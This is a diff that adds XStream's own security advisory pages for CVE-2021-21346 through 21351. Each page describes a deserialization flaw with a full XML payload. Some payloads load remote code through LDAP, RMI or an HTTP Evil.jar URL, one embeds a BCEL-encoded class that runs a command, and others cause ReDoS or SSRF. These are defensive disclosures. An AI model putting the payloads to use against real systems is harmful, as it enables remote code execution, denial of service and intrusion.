diff --git a/xstream-distribution/src/content/CVE-2021-21346.html b/xstream-distribution/src/content/CVE-2021-21346.html
new file mode 100644
index 0000000000000000000000000000000000000000..c57cb13c02575d57fcc051ab8b81654bfc024dc9
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21346.html
@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 29. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21346</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21346: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='javax.swing.MultiUIDefaults' serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>0</int>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale>zh_CN</defaultLocale>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ <javax.swing.MultiUIDefaults>
+ <default>
+ <tables>
+ <javax.swing.UIDefaults serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>1</int>
+ <sun.swing.SwingLazyValue>
+ <className>javax.naming.InitialContext</className>
+ <methodName>doLookup</methodName>
+ <args>
+ <arg>ldap://localhost:1099/CallRemoteMethod</arg>
+ </args>
+ </sun.swing.SwingLazyValue>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ </javax.swing.UIDefaults>
+ </tables>
+ </default>
+ </javax.swing.MultiUIDefaults>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when
+ another element is added to the set.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21347.html b/xstream-distribution/src/content/CVE-2021-21347.html
new file mode 100644
index 0000000000000000000000000000000000000000..693e35c68d172bab237bf6ad456d5e0f64261a1d
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21347.html
@@ -0,0 +1,138 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 2. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21347</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21347: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='java.io.SequenceInputStream'>
+ <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+ <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
+ <names class='java.util.AbstractList$Itr'>
+ <cursor>0</cursor>
+ <lastRet>-1</lastRet>
+ <expectedModCount>0</expectedModCount>
+ <outer-class class='java.util.Arrays$ArrayList'>
+ <a class='string-array'>
+ <string>Evil</string>
+ </a>
+ </outer-class>
+ </names>
+ <processorCL class='java.net.URLClassLoader'>
+ <ucp class='sun.misc.URLClassPath'>
+ <urls serialization='custom'>
+ <unserializable-parents/>
+ <vector>
+ <default>
+ <capacityIncrement>0</capacityIncrement>
+ <elementCount>1</elementCount>
+ <elementData>
+ <url>http://127.0.0.1:80/Evil.jar</url>
+ </elementData>
+ </default>
+ </vector>
+ </urls>
+ <path>
+ <url>http://127.0.0.1:80/Evil.jar</url>
+ </path>
+ <loaders/>
+ <lmap/>
+ </ucp>
+ <package2certs class='concurrent-hash-map'/>
+ <classes/>
+ <defaultDomain>
+ <classloader class='java.net.URLClassLoader' reference='../..'/>
+ <principals/>
+ <hasAllPerm>false</hasAllPerm>
+ <staticPermissions>false</staticPermissions>
+ <key>
+ <outer-class reference='../..'/>
+ </key>
+ </defaultDomain>
+ <initialized>true</initialized>
+ <pdcache/>
+ </processorCL>
+ </iterator>
+ <type>KEYS</type>
+ </e>
+ <in class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>-2147483648</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </in>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the code from the remote server is loaded and executed.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21348.html b/xstream-distribution/src/content/CVE-2021-21348.html
new file mode 100644
index 0000000000000000000000000000000000000000..c961b0d672bea351d42ffb23cc6a14dec60ecc36
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21348.html
@@ -0,0 +1,138 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 19. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21348</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21348: XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos).</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression
+ causing a denial of service.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='java.io.SequenceInputStream'>
+ <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+ <iterator class='java.util.Scanner'>
+ <buf class='java.nio.HeapCharBuffer'>
+ <mark>-1</mark>
+ <position>0</position>
+ <limit>0</limit>
+ <capacity>1024</capacity>
+ <address>0</address>
+ <hb></hb>
+ <offset>0</offset>
+ <isReadOnly>false</isReadOnly>
+ </buf>
+ <position>0</position>
+ <matcher>
+ <parentPattern>
+ <pattern>\p{javaWhitespace}+</pattern>
+ <flags>0</flags>
+ </parentPattern>
+ <from>0</from>
+ <to>0</to>
+ <lookbehindTo>0</lookbehindTo>
+ <text class='java.nio.HeapCharBuffer' reference='../../buf'/>
+ <acceptMode>0</acceptMode>
+ <first>-1</first>
+ <last>0</last>
+ <oldLast>-1</oldLast>
+ <lastAppendPosition>0</lastAppendPosition>
+ <locals/>
+ <hitEnd>false</hitEnd>
+ <requireEnd>false</requireEnd>
+ <transparentBounds>true</transparentBounds>
+ <anchoringBounds>false</anchoringBounds>
+ </matcher>
+ <delimPattern>
+ <pattern>(x+)*y</pattern>
+ <flags>0</flags>
+ </delimPattern>
+ <hasNextPosition>0</hasNextPosition>
+ <source class='java.io.StringReader'>
+ <lock class='java.io.StringReader' reference='..'/>
+ <str>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</str>
+ <length>32</length>
+ <next>0</next>
+ <mark>0</mark>
+ </source>
+ </iterator>
+ <type>KEYS</type>
+ </e>
+ <in class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>0</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </in>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the malicious regular expression is evaluated and causes a denial of service.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never
+ return.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21349.html b/xstream-distribution/src/content/CVE-2021-21349.html
new file mode 100644
index 0000000000000000000000000000000000000000..2bb581773490bc9749cd6a516d3cc95a6fb13455
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21349.html
@@ -0,0 +1,106 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 20. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21349</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21349: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+ from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='java.io.SequenceInputStream'>
+ <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+ <iterator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'>
+ <configs class='sun.misc.FIFOQueueEnumerator'>
+ <queue>
+ <length>1</length>
+ <head>
+ <obj class='url'>http://localhost:8080/internal/</obj>
+ </head>
+ <tail reference='../head'/>
+ </queue>
+ <cursor reference='../queue/head'/>
+ </configs>
+ <returned class='sorted-set'/>
+ </iterator>
+ <type>KEYS</type>
+ </e>
+ <in class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>0</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </in>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+ available only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21350.html b/xstream-distribution/src/content/CVE-2021-21350.html
new file mode 100644
index 0000000000000000000000000000000000000000..94cbc8bc0d85ada388b1a56a1073fcfcd6dd1cbb
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21350.html
@@ -0,0 +1,164 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 20. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21350</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21350: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in an arbitrary code execution.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='java.io.SequenceInputStream'>
+ <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+ <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
+ <names class='java.util.AbstractList$Itr'>
+ <cursor>0</cursor>
+ <lastRet>-1</lastRet>
+ <expectedModCount>0</expectedModCount>
+ <outer-class class='java.util.Arrays$ArrayList'>
+ <a class='string-array'>
+ <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A</string>
+ </a>
+ </outer-class>
+ </names>
+ <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
+ <parent class='sun.misc.Launcher$ExtClassLoader'>
+ </parent>
+ <package2certs class='hashtable'/>
+ <classes defined-in='java.lang.ClassLoader'/>
+ <defaultDomain>
+ <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
+ <principals/>
+ <hasAllPerm>false</hasAllPerm>
+ <staticPermissions>false</staticPermissions>
+ <key>
+ <outer-class reference='../..'/>
+ </key>
+ </defaultDomain>
+ <packages/>
+ <nativeLibraries/>
+ <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
+ <defaultAssertionStatus>false</defaultAssertionStatus>
+ <classes/>
+ <ignored__packages>
+ <string>java.</string>
+ <string>javax.</string>
+ <string>sun.</string>
+ </ignored__packages>
+ <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
+ <__path>
+ <paths/>
+ <class__path>.</class__path>
+ </__path>
+ <__loadedClasses/>
+ </repository>
+ <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
+ </processorCL>
+ </iterator>
+ <type>KEYS</type>
+ </e>
+ <in class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>0</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </in>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+
+ <p>The payload has been directly injected and was generated by following code:</p>
+
+<div class="Source Java"><pre>import com.sun.org.apache.bcel.internal.classfile.Utility;
+import java.io.IOException;
+import java.io.InputStream;
+
+/**
+ * @author threedr3am
+ */
+public class Evil {
+
+ public Evil() throws IOException {
+ Runtime.getRuntime().exec("open -a calculator");
+ }
+
+ public static void main(String[] args) throws IOException {
+ InputStream inputStream = Evil.class.getResourceAsStream("Evil.class");
+ byte[] bytes = new byte[inputStream.available()];
+ inputStream.read(bytes);
+ String code = Utility.encode(bytes, true);
+ String bcel = "$$BCEL$$" + code;
+ System.out.println(bcel);
+ }
+}
+</pre></div>
+
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload with the injected code gets executed.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21351.html b/xstream-distribution/src/content/CVE-2021-21351.html
new file mode 100644
index 0000000000000000000000000000000000000000..4e2e502723be7e1b0993cb7bb3399a2ff9ef052d
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21351.html
@@ -0,0 +1,135 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 27. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21351</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21351: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
+ <m__DTMXRTreeFrag>
+ <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
+ <m__size>-10086</m__size>
+ <m__mgrDefault>
+ <__overrideDefaultParser>false</__overrideDefaultParser>
+ <m__incremental>false</m__incremental>
+ <m__source__location>false</m__source__location>
+ <m__dtms>
+ <null/>
+ </m__dtms>
+ <m__defaultHandler/>
+ </m__mgrDefault>
+ <m__shouldStripWS>false</m__shouldStripWS>
+ <m__indexing>false</m__indexing>
+ <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
+ <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
+ <javax.sql.rowset.BaseRowSet>
+ <default>
+ <concurrency>1008</concurrency>
+ <escapeProcessing>true</escapeProcessing>
+ <fetchDir>1000</fetchDir>
+ <fetchSize>0</fetchSize>
+ <isolation>2</isolation>
+ <maxFieldSize>0</maxFieldSize>
+ <maxRows>0</maxRows>
+ <queryTimeout>0</queryTimeout>
+ <readOnly>true</readOnly>
+ <rowSetType>1004</rowSetType>
+ <showDeleted>false</showDeleted>
+ <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
+ <listeners/>
+ <params/>
+ </default>
+ </javax.sql.rowset.BaseRowSet>
+ <com.sun.rowset.JdbcRowSetImpl>
+ <default/>
+ </com.sun.rowset.JdbcRowSetImpl>
+ </fPullParserConfig>
+ <fConfigSetInput>
+ <class>com.sun.rowset.JdbcRowSetImpl</class>
+ <name>setAutoCommit</name>
+ <parameter-types>
+ <class>boolean</class>
+ </parameter-types>
+ </fConfigSetInput>
+ <fConfigParse reference='../fConfigSetInput'/>
+ <fParseInProgress>false</fParseInProgress>
+ </m__incrementalSAXSource>
+ <m__walker>
+ <nextIsRaw>false</nextIsRaw>
+ </m__walker>
+ <m__endDocumentOccured>false</m__endDocumentOccured>
+ <m__idAttributes/>
+ <m__textPendingStart>-1</m__textPendingStart>
+ <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
+ <m__pastFirstElement>false</m__pastFirstElement>
+ </m__dtm>
+ <m__dtmIdentity>1</m__dtmIdentity>
+ </m__DTMXRTreeFrag>
+ <m__dtmRoot>1</m__dtmRoot>
+ <m__allowRelease>false</m__allowRelease>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when
+ another element is added to the set.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-29505.html b/xstream-distribution/src/content/CVE-2021-29505.html
new file mode 100644
index 0000000000000000000000000000000000000000..378eab8b601893ffbb3f826ee0baf4791c8426c4
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-29505.html
@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 8. May 2021 by Joerg Schaible
+ -->
